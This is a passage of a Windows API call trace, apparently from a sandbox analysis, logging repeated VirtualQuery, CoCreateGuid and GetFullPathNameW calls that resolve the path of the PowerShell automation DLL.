__alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.781] VirtualQuery (in: lpAddress=0xcb400, lpBuffer=0xcc2c0, dwLength=0x30 | out: lpBuffer=0xcc2c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.782] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.783] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.783] VirtualQuery (in: lpAddress=0xcb730, lpBuffer=0xcc5f0, dwLength=0x30 | out: lpBuffer=0xcc5f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.783] VirtualQuery (in: lpAddress=0xcb7c0, lpBuffer=0xcc680, dwLength=0x30 | out: lpBuffer=0xcc680*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.784] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x930f8920, Data2=0xd45f, Data3=0x49d8, Data4=([0]=0xa8, [1]=0x12, [2]=0xdf, [3]=0x19, [4]=0x88, [5]=0xad, [6]=0x83, [7]=0xc7))) returned 0x0 [0078.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.785] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xb3906160, Data2=0xfa1, Data3=0x43da, Data4=([0]=0x9e, [1]=0x74, [2]=0xe2, [3]=0xb, [4]=0xcd, [5]=0x36, [6]=0x2b, [7]=0x9f))) returned 0x0 [0078.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.789] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.790] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.790] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.791] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.791] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.791] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.792] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.793] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.793] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.794] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.795] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.795] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.796] VirtualQuery (in: lpAddress=0xcae30, lpBuffer=0xcbcf0, dwLength=0x30 | out: lpBuffer=0xcbcf0*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.796] VirtualQuery (in: lpAddress=0xcaec0, lpBuffer=0xcbd80, dwLength=0x30 | out: lpBuffer=0xcbd80*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb540, lpFilePart=0x0 | out: 